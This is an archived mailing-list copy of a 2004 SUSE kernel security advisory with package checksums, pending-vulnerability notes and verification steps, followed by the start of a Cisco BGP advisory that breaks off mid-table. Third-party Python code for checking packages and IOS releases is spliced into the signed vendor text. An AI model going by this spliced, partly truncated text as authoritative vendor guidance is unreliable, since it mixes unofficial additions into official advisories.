ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/src/k_athlon-2.4.20-113.src.rpm
a5e5790e5f7fe62905d29750543c9e20
ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/src/k_deflt-2.4.20-113.src.rpm
9defa7cb706e924f8336dd03fafbcfd5
ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/src/k_psmp-2.4.20-113.src.rpm
8469dbc8810dd292100d085e00bb6081
ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/src/k_smp-2.4.20-113.src.rpm
d990fcbace1f21ff383abdf7608a17ef
SuSE-8.1:
ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/kernel-source-2.4.21-226.i586.rpm
43ee5eae102f0258a414dd15e3fd9433
ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/k_athlon-2.4.21-226.i586.rpm
0c6289e168307d615bfe6cef9ebcf879
ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/k_deflt-2.4.21-226.i586.rpm
003a38c53fe91070eeae85983930c70e
ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/k_psmp-2.4.21-226.i586.rpm
657d08fa4b5a2ba7de2a314a7d1622e1
ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/k_smp-2.4.21-226.i586.rpm
e19239b4ca52ebd21f775b5e6195f144
source rpm(s):
ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/src/kernel-source-2.4.21-226.src.rpm
ee67f5db0ea2f1431f46b7dd27815a56
ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/src/k_athlon-2.4.21-226.src.rpm
b29021156d6582e315666b16231b2a60
ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/src/k_deflt-2.4.21-226.src.rpm
ce5e47d527cee6968cd95bb8430d3e18
ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/src/k_psmp-2.4.21-226.src.rpm
a081a0f1e31f5491cdeba1fea5ea6411
ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/src/k_smp-2.4.21-226.src.rpm
1dbfd3b5f272fc75342ae55bbe7ab45c
SuSE-8.0:
ftp://ftp.suse.com/pub/suse/i386/update/8.0/d3/kernel-source-2.4.18.SuSE-299.i386.rpm
7de319a4e6c667fba359686b814d4a73
ftp://ftp.suse.com/pub/suse/i386/update/8.0/images/k_deflt-2.4.18-299.i386.rpm
df5aad7c423625a19af151bbba0f2ca8
ftp://ftp.suse.com/pub/suse/i386/update/8.0/images/k_psmp-2.4.18-299.i386.rpm
cb02c8381962eda997ebb115ef68ae4c
ftp://ftp.suse.com/pub/suse/i386/update/8.0/images/k_smp-2.4.18-299.i386.rpm
903c6e61927803c2d592ac50fe9da6ce
ftp://ftp.suse.com/pub/suse/i386/update/8.0/images/k_i386-2.4.18-299.i386.rpm
e2abf9ccdc8191e7d2ace58e8a1b5b5a
source rpm(s):
ftp://ftp.suse.com/pub/suse/i386/update/8.0/zq1/kernel-source-2.4.18.SuSE-299.nosrc.rpm
622c85342dd84abd0400103902d05eed
ftp://ftp.suse.com/pub/suse/i386/update/8.0/zq1/k_deflt-2.4.18-299.src.rpm
37916ea39febc4dd43fabfccce9322db
ftp://ftp.suse.com/pub/suse/i386/update/8.0/zq1/k_psmp-2.4.18-299.src.rpm
0dde0e6758e42de5479e8776475ae76f
ftp://ftp.suse.com/pub/suse/i386/update/8.0/zq1/k_smp-2.4.18-299.src.rpm
523bef4e31fa67f078d5fcbdc426a4c0
ftp://ftp.suse.com/pub/suse/i386/update/8.0/zq1/k_i386-2.4.18-299.src.rpm
06a2a062a54764a30adae0b8ea40cb29
Opteron x86_64 Platform:
SuSE-9.1:
ftp://ftp.suse.com/pub/suse/x86_64/update/9.1/rpm/x86_64/kernel-source-2.6.5-7.75.x86_64.rpm
1c878b1e29a9bea40547637b6a307b2d
ftp://ftp.suse.com/pub/suse/x86_64/update/9.1/rpm/x86_64/kernel-default-2.6.5-7.75.x86_64.rpm
16de3ee2390bb2b92f9fe50451d4f082
ftp://ftp.suse.com/pub/suse/x86_64/update/9.1/rpm/x86_64/kernel-smp-2.6.5-7.75.x86_64.rpm
c310268daa83f18fcfd4cf19434f06e0
source rpm(s):
ftp://ftp.suse.com/pub/suse/x86_64/update/9.1/rpm/src/kernel-source-2.6.5-7.75.src.rpm
2fed0a8f3936027261add7d1cbfa5341
ftp://ftp.suse.com/pub/suse/x86_64/update/9.1/rpm/src/kernel-default-2.6.5-7.75.nosrc.rpm
9ad26d15566337c83273121390ea4e32
ftp://ftp.suse.com/pub/suse/x86_64/update/9.1/rpm/src/kernel-smp-2.6.5-7.75.nosrc.rpm
352951be42b3093efb0148320a6f4c27
SuSE-9.0:
ftp://ftp.suse.com/pub/suse/x86_64/update/9.0/rpm/x86_64/kernel-source-2.4.21-226.x86_64.rpm
ced9c66ffa28bf7e7c795781f92083fe
ftp://ftp.suse.com/pub/suse/x86_64/update/9.0/rpm/x86_64/k_deflt-2.4.21-226.x86_64.rpm
60539bc47e8cac0664ac5ca824d311e0
ftp://ftp.suse.com/pub/suse/x86_64/update/9.0/rpm/x86_64/k_smp-2.4.21-226.x86_64.rpm
083aeedd2a88ccc2e00c8f66cd61b81c
source rpm(s):
ftp://ftp.suse.com/pub/suse/x86_64/update/9.0/rpm/src/kernel-source-2.4.21-226.src.rpm
58c40a206f6f615daa3486fc6d6ade38
ftp://ftp.suse.com/pub/suse/x86_64/update/9.0/rpm/src/k_deflt-2.4.21-226.src.rpm
1c234f6c0475680b41c644c575ff8ef6
ftp://ftp.suse.com/pub/suse/x86_64/update/9.0/rpm/src/k_smp-2.4.21-226.src.rpm
e9b90824615859405b1979793662bc0d
______________________________________________________________________________
2) Pending vulnerabilities in SUSE Distributions and Workarounds:
- icecast
The icecast service is vulnerable to a remote denial-of-service
attack. Update packages will be available soon.
- sitecopy
The sitecopy package includes a vulnerable version of the
neon library (CAN-2004-0179, CAN-2004-0398). Update packages will be
available soon.
- cadaver
The cadaver package includes a vulnerable version of the
neon library (CAN-2004-0179, CAN-2004-0398). Update packages will be
available soon.
- OpenOffice_org
The OpenOffice_org package includes a vulnerable version
of the neon library (CAN-2004-0179, CAN-2004-0398). Update packages
will be available soon.
- tripwire
A format string bug in tripwire can be exploited locally
to gain root permissions. Update packages will be available soon.
- postgresql
A buffer overflow in psqlODBC could be exploited to crash the
application using it. E.g. a PHP script that uses ODBC to access a
PostgreSQL database can be utilized to crash the surrounding Apache
web-server. Other parts of PostgreSQL are not affected.
Update packages will be available soon.
- lha
Minor security fix for a buffer overflow while handling command
line options. This buffer overflow could be exploited in conjunction
with other mechanisms to gain higher privileges or access the system
remotely.
- XDM/XFree86
This update fixes XDM unexpectedly listening on ports, which allows
connecting via XDMCP. Only SUSE LINUX 9.1 is affected.
New packages are currently being tested and will be
available soon.
- mod_proxy
A buffer overflow can be triggered by malicious remote
servers that return a negative Content-Length value.
This vulnerability can be used to execute commands remotely.
New packages are currently being tested and will be
available soon.
______________________________________________________________________________
3) standard appendix: authenticity verification, additional information
- Package authenticity verification:
SUSE update packages are available on many mirror ftp servers around
the world. While this service is considered valuable and important
to the free and open source software community, many users wish to be
certain of the origin of the package and its content before
installing the package. There are two independent verification methods
that can be used to prove the authenticity of a downloaded file or
rpm package:
1) md5sums as provided in the (cryptographically signed) announcement.
2) using the internal gpg signatures of the rpm package.
1) execute the command
md5sum <name-of-the-file.rpm>
after you have downloaded the file from a SUSE ftp server or its
mirrors. Then, compare the resulting md5sum with the one that is
listed in the announcement. Since the announcement containing the
checksums is cryptographically signed (usually using the key
security@suse.de), the checksums offer proof of the authenticity
of the package.
We recommend against subscribing to security lists which cause the
email message containing the announcement to be modified so that
the signature does not match after transport through the mailing
list software.
Downsides: You must be able to verify the authenticity of the
announcement in the first place. If RPM packages are being rebuilt
and a new version of a package is published on the ftp server, all
md5 sums for the files are useless.
2) rpm package signatures provide an easy way to verify the authenticity
of an rpm package. Use the command
rpm -v --checksig <file.rpm>
to verify the signature of the package, where <file.rpm> is the
filename of the rpm package that you have downloaded. Of course,
package authenticity verification can only target an un-installed rpm
package file.
Prerequisites:
a) gpg is installed
b) The package is signed using a certain key. The public part of this
key must be imported with the gpg program into the ~/.gnupg/
directory of the user who performs the signature verification
(usually root). You can import the key that is used by SUSE in
rpm packages for SUSE Linux by saving this announcement to a
file ("announcement.txt") and running the command (do "su -" to
be root):
gpg --batch; gpg < announcement.txt | gpg --import
SUSE Linux distributions version 7.1 and thereafter install the
key "build@suse.de" upon installation or upgrade, provided that
the package gpg is installed. The file containing the public key
is placed at the top-level directory of the first CD (pubring.gpg)
and at ftp://ftp.suse.com/pub/suse/pubring.gpg-build.suse.de .
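Both verification methods above are easy to get wrong by hand when an update spans a dozen RPMs, so here is an added example (my own code, not SUSE's tooling) that extracts the file-name/md5 pairs from the announcement text, compares them with what was downloaded, and hands each package to `rpm -v --checksig`. It assumes the layout of the list above, a download URL followed on the next line by its md5sum; the script and argument names in the usage block are assumptions.

```python
"""Added example (not SUSE's tooling): check downloaded update RPMs against the
md5 list of an announcement, then against the package's own gpg signature."""
import hashlib
import os
import re
import subprocess
from typing import Dict, Tuple

MD5_RE = re.compile(r"^[0-9a-f]{32}$")


def parse_checksums(announcement: str) -> Dict[str, str]:
    """Map RPM file name -> md5 from announcement text.

    Assumed layout (as in the list above): a download URL on one line and its
    md5sum on the next; headings such as 'SuSE-9.1:' or 'source rpm(s):' are
    ignored because they are neither URLs nor 32 hex digits.
    """
    sums: Dict[str, str] = {}
    pending = None
    for raw in announcement.splitlines():
        line = raw.strip()
        if line.startswith(("ftp://", "http://")):
            pending = line.rsplit("/", 1)[-1]
        elif pending and MD5_RE.match(line):
            sums[pending] = line
            pending = None
    return sums


def md5_of(path: str) -> str:
    """Same digest `md5sum <file>` prints, computed in 64 KiB chunks."""
    h = hashlib.md5()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def verify_downloads(directory: str, sums: Dict[str, str]) -> Dict[str, str]:
    """Status per announced file: 'ok', 'mismatch' (do not install) or 'missing'."""
    status: Dict[str, str] = {}
    for name, expected in sums.items():
        path = os.path.join(directory, name)
        if not os.path.isfile(path):
            status[name] = "missing"
        else:
            status[name] = "ok" if md5_of(path) == expected else "mismatch"
    return status


def rpm_checksig(path: str) -> Tuple[bool, str]:
    """Method 2 from the announcement: the rpm's internal gpg signature.

    Needs rpm and the SUSE build key in root's keyring, so it is not exercised
    offline; rpm exits non-zero when the signature does not verify.
    """
    proc = subprocess.run(["rpm", "-v", "--checksig", path],
                          capture_output=True, text=True)
    return proc.returncode == 0, proc.stdout + proc.stderr


if __name__ == "__main__":
    import sys
    # usage: verify_rpms.py announcement.txt download_dir  (names are assumptions)
    with open(sys.argv[1], encoding="utf-8", errors="replace") as f:
        announced = parse_checksums(f.read())
    for name, state in sorted(verify_downloads(sys.argv[2], announced).items()):
        print(f"{state:8s} {name}")
```

The md5 comparison proves nothing unless the announcement's PGP signature was checked first, as the text says; and since MD5 collisions became practical later in 2004, the rpm signature check is the one to rely on today, with the md5 list serving only to catch a corrupted or stale mirror copy.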
- SUSE runs two security mailing lists to which any interested party may
subscribe:
suse-security@suse.com
- general/linux/SUSE security discussion.
All SUSE security announcements are sent to this list.
To subscribe, send an email to
<suse-security-subscribe@suse.com>.
suse-security-announce@suse.com
- SUSE's announce-only mailing list.
Only SUSE's security announcements are sent to this list.
To subscribe, send an email to
<suse-security-announce-subscribe@suse.com>.
For general information or the frequently asked questions (faq)
send mail to:
<suse-security-info@suse.com> or
<suse-security-faq@suse.com> respectively.
=====================================================================
SUSE's security contact is <security@suse.com> or <security@suse.de>.
The <security@suse.de> public key is listed below.
=====================================================================
______________________________________________________________________________
The information in this advisory may be distributed or reproduced,
provided that the advisory is not modified in any way. In particular,
it is desired that the clear-text signature show proof of the
authenticity of the text.
SUSE Linux AG makes no warranties of any kind whatsoever with respect
to the information contained in this security advisory.
Type Bits/KeyID Date User ID
pub 2048R/3D25D3D9 1999-03-06 SuSE Security Team <security@suse.de>
pub 1024D/9C800ACA 2000-10-19 SuSE Package Signing Key <build@suse.de>
- -----BEGIN PGP PUBLIC KEY BLOCK-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org
=LRKC
- -----END PGP PUBLIC KEY BLOCK-----
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.2 (GNU/Linux)
iQEVAwUBQNBTgney5gA9JdPZAQHB7Af/XRy01sYB1rDi0L+TwlQtW4nr4vwrJTOt
6pA/M+oNsW0SUPK3kCcN+v7mvuIrA69c1VZeYgfI4/dy0bdMntcVkOliikn0+m0i
e2SvKYY+/KC8wZaUIrKFbH4PA0Gdf40GmNVj4uq5KdwohJLGQDTa8eguiYocMjXv
E8QAdGTaPXEBGz8Ode6YMYAbauHbWXip9x6TyQ7NgiQ4mylabmmw8AUebVyM4oWS
a28uoT8nWPu+BwYNW0zt26clPhLvmHWFpIpqyaWERaWMuCrFHwlc753B2PCOVdnm
Yj/ugqlkkGRysclITz3WFbUGUKtd91AdZAEK6l+MxkuqRDZmNUYgHw==
=q9W1
-----END PGP SIGNATURE-----
[Full-Disclosure] Cisco Security Advisory: Cisco IOS Malformed BGP packet causes reload
From: Cisco Systems Product Security Incident Response Team (psirt@cisco.com)
Date: Wed Jun 16 2004 - 10:00:00 CDT
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Cisco Security Advisory: Cisco IOS Malformed BGP Packet Causes Reload
Revision 1.0
============
Last Updated June 16 15:00 UTC (GMT)
For Public Release 2004 June 16 15:00 UTC (GMT)
- -------------------------------------------------------------------------------
Contents
Summary
Affected Products
Details
Impact
Software Versions and Fixes
Obtaining Fixed Software
Workarounds
Exploitation and Public Announcements
Status of This Notice: FINAL
Distribution
Revision History
Cisco Security Procedures
- -------------------------------------------------------------------------------
Summary
=======
A Cisco device running IOS and enabled for the Border Gateway Protocol (BGP) is
vulnerable to a Denial of Service (DOS) attack from a malformed BGP packet. The
BGP protocol is not enabled by default, and must be configured in order to
accept traffic from an explicitly defined peer. Unless the malicious traffic
appears to be sourced from a configured, trusted peer, it would be difficult to
inject a malformed packet.
Cisco has made free software available to address this problem.
This advisory is available at
http://www.cisco.com/warp/public/707/cisco-sa-20040616-bgp.shtml.
Affected Products
=================
Vulnerable Products
This issue affects all Cisco devices running any unfixed version of Cisco IOS
code and configured for BGP routing.
A router which is running the BGP process will have a line in the config
defining the AS number, which can be seen by issuing the command show
running-config:
router bgp <AS number>
This vulnerability is present in any unfixed version of IOS, from the beginning
of support for the BGP protocol, including versions 9.x, 10.x, 11.x and 12.x.
To determine the software running on a Cisco product, log in to the device and
issue the show version command to display the system banner. Cisco IOS software
will identify itself as "Internetwork Operating System Software" or simply
"IOS ®." On the next line of output, the image name will be displayed between
parentheses, followed by "Version" and the IOS release name. Other Cisco
devices will not have the show version command or will give different output.
The following example identifies a Cisco product running IOS release 12.0(3)
with an installed image name of C2500-IS-L:
Cisco Internetwork Operating System Software IOS (TM)
2500 Software (C2500-IS-L), Version 12.0(3), RELEASE SOFTWARE
The release train label is "12.0."
The next example shows a product running IOS release 12.0(2a)T1 with an image
name of C2600-JS-MZ:
Cisco Internetwork Operating System Software IOS (tm)
C2600 Software (C2600-JS-MZ), Version 12.0(2a)T1, RELEASE SOFTWARE (fc1)
Additional information about Cisco IOS release naming can be found at
http://www.cisco.com/warp/public/620/1.html.
Products Confirmed Not Vulnerable
Products confirmed not to be vulnerable include devices which cannot
participate in BGP or cannot be configured for BGP.
Details
=======
The Border Gateway Protocol (BGP) is a routing protocol defined by RFC 1771,
and designed to manage IP routing in large networks. An affected Cisco device
running a vulnerable version of Cisco IOS software and enabling the BGP
protocol will reload when a malformed BGP packet is received. BGP runs over
TCP, a reliable transport protocol which requires a valid three-way handshake
before any further messages will be accepted. The Cisco IOS implementation of
BGP requires the explicit definition of a neighbor before a connection can be
established, and traffic must appear to come from that neighbor. These
implementation details make it very difficult to send a BGP packet to a Cisco
IOS device from an unauthorized source.
A Cisco device receiving an invalid BGP packet will reset and may take several
minutes to become fully functional. This vulnerability may be exploited
repeatedly resulting in an extended DOS attack. This issue is documented in bug
IDs CSCdu53656 and CSCea28131.
Impact
======
Successful exploitation of this vulnerability results in a reload of the
device. Repeated exploitation could result in a sustained DoS attack.
Software Versions and Fixes
===========================
Note: Many of the releases in this table were fixed prior to the release of
other IOS advisories. Read the table carefully to determine if your IOS release
contains these fixes. Most fixed releases for the TCP and SNMP advisories such
as http://www.cisco.com/warp/public/707/cisco-sa-20040420-snmp.shtml and
http://www.cisco.com/warp/public/707/cisco-sa-20040420-tcp-ios.shtml
contained the fixes for this BGP advisory.
Each row of the Cisco IOS software table (below) describes a release train and
the platforms or products for which it is intended. If a given release train is
vulnerable, then the earliest possible releases that contain the fix (the
"First Fixed Release") and the anticipated date of availability for each are
listed in the "Rebuild," "Interim," and "Maintenance" columns. A device running
a release in the given train that is earlier than the release in a specific
column (less than the First Fixed Release) is known to be vulnerable. The
release should be upgraded at least to the indicated release or a later version
(greater than or equal to the First Fixed Release label). When selecting a
release, keep in mind the following definitions:
Maintenance
Most heavily tested, stable, and highly recommended release of a release train
in any given row of the table.
Rebuild
Constructed from the previous maintenance or major release in the same train,
it contains the fix for a specific defect. Although it receives less testing,
it contains only the minimal changes necessary to repair the vulnerability.
Interim
Built at regular intervals between maintenance releases and receives less
testing. Interims should be selected only if there is no other suitable release
that addresses the vulnerability. Interim images should be upgraded to the next
available maintenance release as soon as possible. Interim releases are not
available through manufacturing, and usually they are not available for
customer download from Cisco.com without prior arrangement with the Cisco TAC.
In all cases, customers should exercise caution to confirm that the devices to
be upgraded contain sufficient memory and that current hardware and software
configurations will continue to be supported properly by the new software
release. If the information is not clear, contact the Cisco TAC for assistance
as shown in the Obtaining Fixed Software section below.
More information on Cisco IOS software release names and abbreviations is
available at http://www.cisco.com/warp/public/620/1.html.
The fixes will be available at the Software Center located at
http://www.cisco.com/tacpage/sw-center/.
For software installation and upgrade procedures, see
http://www.cisco.com/warp/public/130/upgrade_index.shtml.
For a current view of all posted and repaired images for Cisco IOS, please
check the listing available to registered Cisco.com users at:
http://www.cisco.com/tacpage/sw-center/sw-ios.shtml.
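The rule stated above (a release in the same train that is earlier than the First Fixed Release is vulnerable; a release from another train needs the migration the table names) is mechanical enough to code. The following is an added example, not Cisco software: it pulls the image name and release out of the `show version` banner quoted earlier and compares that release with a First Fixed Release taken from the table. The release grammar it accepts is an assumption drawn from the labels in the table; compound labels such as 12.0(16)W5(21c) are rejected rather than guessed at.

```python
"""Added example (not Cisco software): read the release from a `show version`
banner and apply the First Fixed Release rule from the advisory table."""
import re
from typing import NamedTuple, Optional, Tuple

# Accepted forms (an assumption drawn from the table): major.minor(maint[rebuild])
# optionally followed by TRAIN letters, a train number and a rebuild letter, e.g.
# 12.0(3), 12.0(2a)T1, 12.0(22)S2e, 12.1(14)AZ. Compound labels such as
# 12.0(16)W5(21c) are rejected so they are checked by hand, not misread.
RELEASE_RE = re.compile(r"^(\d+)\.(\d+)\((\d+)([a-z]?)\)([A-Z]*)(\d*)([a-z]?)$")
BANNER_RE = re.compile(r"^\S+ Software \(([^)]+)\), Version ([^,]+),", re.MULTILINE)


class IosRelease(NamedTuple):
    major: int
    minor: int
    train: str           # "" for the mainline release; "T", "S", "E", "AZ", ...
    maint: int           # maintenance number inside the parentheses
    rebuild: str         # letter after it ("a" in 12.0(2a)), "" if none
    train_num: int       # number after the train letters (1 in T1), 0 if none
    train_rebuild: str   # letter after that number ("e" in S2e), "" if none

    @property
    def train_key(self) -> Tuple[int, int, str]:
        return (self.major, self.minor, self.train)

    @property
    def order_key(self) -> Tuple[int, str, int, str]:
        return (self.maint, self.rebuild, self.train_num, self.train_rebuild)


def parse_ios_release(text: str) -> IosRelease:
    m = RELEASE_RE.match(text.strip())
    if not m:
        raise ValueError(f"unrecognised IOS release label: {text!r}")
    major, minor, maint, rebuild, train, tnum, trebuild = m.groups()
    return IosRelease(int(major), int(minor), train, int(maint), rebuild,
                      int(tnum) if tnum else 0, trebuild)


def parse_show_version(banner: str) -> Optional[Tuple[str, str]]:
    """(image name, release) from the banner, or None if it is not IOS output."""
    if "Internetwork Operating System Software" not in banner and "IOS" not in banner:
        return None
    m = BANNER_RE.search(banner)
    return (m.group(1), m.group(2)) if m else None


def check_release(running: str, first_fixed: str) -> str:
    """'fixed' if running >= first_fixed within the same train, 'vulnerable' if it
    is earlier, 'migrate' if the trains differ (the table then names a target)."""
    cur, fix = parse_ios_release(running), parse_ios_release(first_fixed)
    if cur.train_key != fix.train_key:
        return "migrate"
    return "fixed" if cur.order_key >= fix.order_key else "vulnerable"


if __name__ == "__main__":
    # The second banner quoted in the advisory, checked against table rows.
    banner = ("Cisco Internetwork Operating System Software IOS (tm)\n"
              "C2600 Software (C2600-JS-MZ), Version 12.0(2a)T1, RELEASE SOFTWARE (fc1)\n")
    image, release = parse_show_version(banner)
    print(image, release, check_release(release, "12.1(5)T19"))   # migrate
    print(check_release("12.0(22)S2", "12.0(22)S2e"))              # vulnerable
```

The ordering key compares the maintenance number first, then its rebuild letter, then the train number and its rebuild letter, so 12.0(26)S counts as later than the 12.0(22)S5 rebuild, and 12.0(22)S2 counts as earlier than 12.0(22)S2e, which is what the table's row layout implies.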
+------------------------------------------------+
| Major | Availability of Repaired Releases |
| Release | * |
|------------+-----------------------------------|
| Affected | | Interim | |
| 11.1-Based | Rebuild | ** | Maintenance |
| Release | | | |
|------------+-----------------------------------|
| 11.1 | Migrate to 11.2 or later |
|------------+-----------------------------------|
| 11.1AA | Migrate to 11.2P or later |
|------------+-----------------------------------|
| 11.1CA | Migrate to 12.0 or later |
|------------+-----------------------------------|
| 11.1CC | Migrate to 12.0 or later |
|------------+-----------------------------------|
| Affected | | Interim | |
| 11.2-Based | Rebuild | ** | Maintenance |
| Release | | | |
|------------+-----------+---------+-------------|
| 11.2 | 11.2(26g) | | |
|------------+-----------+---------+-------------|
| 11.2P | 11.2(26) | | |
| | P7 | | |
|------------+-----------------------------------|
| 11.2SA | Not Vulnerable |
|------------+-----------------------------------|
| Affected | | Interim | |
| 11.3-Based | Rebuild | ** | Maintenance |
| Release | | | |
|------------+-----------+---------+-------------|
| 11.3 | 11.3(11f) | | |
|------------+-----------+---------+-------------|
| 11.3T | 11.3(11b) | | |
| | T5 | | |
|------------+-----------+---------+-------------|
| Affected | | Interim | |
| 12.0-Based | Rebuild | ** | Maintenance |
| Release | | | |
|------------+-----------+---------+-------------|
| 12.0 | | | 12.0(27) |
|------------+-----------------------------------|
| 12.0DA | Migrate to 12.2DA or later |
|------------+-----------------------------------|
| | 12.0(21) | | |
| | S7 | | |
| |-----------+---------+-------------|
| | 12.0(22) | | |
| | S2e | | |
| |-----------+---------+-------------|
| | 12.0(22) | | |
| | S3c | | |
| |-----------+---------+-------------|
| | 12.0(22) | | |
| | S4a | | |
| |-----------+---------+-------------|
| 12.0S | 12.0(22) | | |
| | S5 | | |
| |-----------+---------+-------------|
| | 12.0(23) | | |
| | S3 | | |
| |-----------+---------+-------------|
| | 12.0(24) | | |
| | S2 | | |
| |-----------+---------+-------------|
| | 12.0(25) | | |
| | S1 | | |
| |-----------+---------+-------------|
| | | | 12.0(26)S |
|------------+-----------------------------------|
| 12.0SL | Migrate to 12.0(23)S3 or later |
|------------+-----------------------------------|
| | 12.0(17) | | |
| | ST10 | | |
| | Available | | |
| | upon | | |
| 12.0ST | request | | |
| |-----------+---------+-------------|
| | 12.0(21) | | |
| | ST7 | | |
| |-----------------------------------|
| | Migrate to 12.0(26)S2 or later |
|------------+-----------------------------------|
| 12.0SV | | | 12.0(27)SV |
|------------+-----------+---------+-------------|
| 12.0SX | 12.0(25) | | |
| | SX | | |
|------------+-----------+---------+-------------|
| | 12.0(23) | | |
| | SZ3 | | |
|12.0SZ |-----------+---------+-------------|
| | | | 12.0(26)SZ |
| |-----------------------------------|
| | Migrate to 12.0(26)S2 or later |
|------------+-----------------------------------|
| 12.0T | Migrate to 12.1 or later |
|------------+-----------------------------------|
| | 12.0(16) | | |
| | W5(21c) | | |
| |-----------+---------+-------------|
| | 12.0(25) | | |
| | W5(27b) | | |
|12.0W5 |-----------+---------+-------------|
| | 12.0(26) | | |
| | W5(28a) | | |
| |-----------+---------+-------------|
| | 12.0(27) | | |
| | W5(29) | | |
|------------+-----------------------------------|
| 12.0WC | Not Vulnerable |
|------------+-----------------------------------|
| 12.0WX | Migrate to 12.0W5 or later |
|------------+-----------------------------------|
| 12.0XA | Migrate to 12.1 latest or later |
|------------+-----------------------------------|
| 12.0XC | Migrate to 12.1 latest or later |
|------------+-----------------------------------|
| 12.0XD | Migrate to 12.1 latest or later |
|------------+-----------------------------------|
| 12.0XE | Migrate to 12.1E latest or later |
|------------+-----------------------------------|
| 12.0XG | Migrate to 12.1 latest or later |
|------------+-----------------------------------|
| 12.0XH | Migrate to 12.1 latest or later |
|------------+-----------------------------------|
| 12.0XI | Migrate to 12.1 latest or later |
|------------+-----------------------------------|
| 12.0XJ | Migrate to 12.1 latest or later |
|------------+-----------------------------------|
| 12.0XK | Migrate to 12.1T latest or later |
|------------+-----------------------------------|
| 12.0XL | Migrate to 12.2 latest or later |
|------------+-----------------------------------|
| 12.0XN | Migrate to 12.1 latest or later |
|------------+-----------------------------------|
| 12.0XP | Not Vulnerable |
|------------+-----------------------------------|
| 12.0XR | Migrate to 12.2 latest or later |
|------------+-----------------------------------|
| 12.0XS | Migrate to 12.1E latest or later |
|------------+-----------------------------------|
| 12.0XU | Not Vulnerable |
|------------+-----------------------------------|
| Affected | | Interim | |
| 12.1-Based | Rebuild | ** | Maintenance |
| Release | | | |
|------------+-----------+---------+-------------|
| 12.1 | | | 12.1(20) |
|------------+-----------------------------------|
| 12.1AA | Migrate to 12.2 latest or later |
|------------+-----------------------------------|
| 12.1AX | Not Vulnerable |
|------------+-----------------------------------|
| 12.1AY | Not Vulnerable |
|------------+-----------+-----------------------|
| 12.1AZ | | | 12.1(14)AZ |
|------------+-----------------------------------|
| 12.1DA | Migrate to 12.2DA or later |
|------------+-----------------------------------|
| 12.1DB | Migrate to 12.2B or later |
|------------+-----------------------------------|
| | 12.1(6) | | |
| | E12.0 | | |
| |-----------+---------+-------------|
| | 12.1(8b) | | |
| | E14 | | |
| |-----------+---------+-------------|
| | 12.1(11b) | | |
| | E12.0 | | |
| |-----------+---------+-------------|
| | 12.1(12c) | | |
| 12.1E | E7 | | |
| |-----------+---------+-------------|
| | 12.1(13) | | |
| | E6 | | |
| |-----------+---------+-------------|
| | 12.1(14) | | |
| | E4 | | |
| |-----------+---------+-------------|
| | 12.1(19)E | | |
| |-----------+---------+-------------|
| | | | 12.1(20)E |
|------------+-----------+---------+-------------|
| 12.1EA | 12.1(14) | | |
| | EA1 | | |
|------------+-----------+---------+-------------|
| 12.1EB | 12.1(14) | | |
| | EB1 | | |
|------------+-----------+---------+-------------|
| 12.1EC | | | 12.1(19)EC |
|------------+-----------+---------+-------------|
| 12.1EO | | | 12.1(19)EO |
|------------+-----------+---------+-------------|
| 12.1EV | 12.1(12c) | | |
| | EV2 | | |
|------------+-----------+---------+-------------|
| 12.1EW | | | 12.1(19)EW |
|------------+-----------------------------------|
| 12.1EX | Migrate to 12.1(14)E4 or later |
|------------+-----------------------------------|
| 12.1EY | Migrate to 12.1(14)E4 or later |
|------------+-----------------------------------|
| 12.1T | 12.1(5) | | |
| | T19 | | |
|------------+-----------------------------------|
| 12.1XA | Migrate to 12.1(5)T19 or later |
|------------+-----------------------------------|
| 12.1XB | Migrate to 12.1(5)T19 or later |
|------------+-----------------------------------|
| 12.1XC | Migrate to 12.1(5)T19 or later |
|------------+-----------------------------------|
| 12.1XD | Migrate to 12.2 or later |
|------------+-----------------------------------|
| 12.1XE | Migrate to 12.1E latest or later |
|------------+-----------------------------------|
| 12.1XF | Migrate to 12.2(4)T6 or later |
|------------+-----------------------------------|
| 12.1XG | Migrate to 12.2(4)T6 or later |
|------------+-----------------------------------|
| 12.1XH | Migrate to 12.2 or later |
|------------+-----------------------------------|
| 12.1XI | Migrate to 12.2 latest or later |
|------------+-----------------------------------|
| 12.1XJ | Migrate to 12.2(4)T6 or later |
|------------+-----------------------------------|
| 12.1XL | Migrate to 12.2T latest or later |
|------------+-----------------------------------|
| 12.1XM | Migrate to 12.2T latest or later |
|------------+-----------------------------------|
| 12.1XP | Migrate to 12.2(4)T6 or later |
|------------+-----------------------------------|
| 12.1XQ | Migrate to 12.2T latest or later |
|------------+-----------------------------------|
| 12.1XR | Migrate to 12.2T latest or later |
|------------+-----------------------------------|
| 12.1XT | Migrate to 12.2(4)T6 or later |
|------------+-----------------------------------|
| 12.1XU | Migrate to 12.2T latest or later |
|------------+-----------------------------------|
| 12.1XV | Migrate to 12.2XB or later |
|------------+-----------------------------------|
| 12.1XY | Migrate to 12.2XB or later |
|------------+-----------------------------------|
| 12.1YA | Migrate to 12.2(8)T10 or later |
|------------+-----------------------------------|
| 12.1YB | Migrate to 12.2(4)T6 or later |
|------------+-----------------------------------|
| 12.1YC | Migrate to 12.2(8)T10 or later |
|------------+-----------------------------------|
| 12.1YD | Migrate to 12.2(8)T10 or later |
|------------+-----------------------------------|
| 12.1YH | Migrate to 12.2(13)T5 or later |
|------------+-----------------------------------|
| 12.1YJ | Not Vulnerable |
|------------+-----------------------------------|
| Affected | | Interim | |
| 12.2-Based | Rebuild | ** | Maintenance |
| Release | | | |
|------------+-----------+---------+-------------|
| | 12.2(10d) | | |
| |-----------+---------+-------------|
| | 12.2(12e) | | |
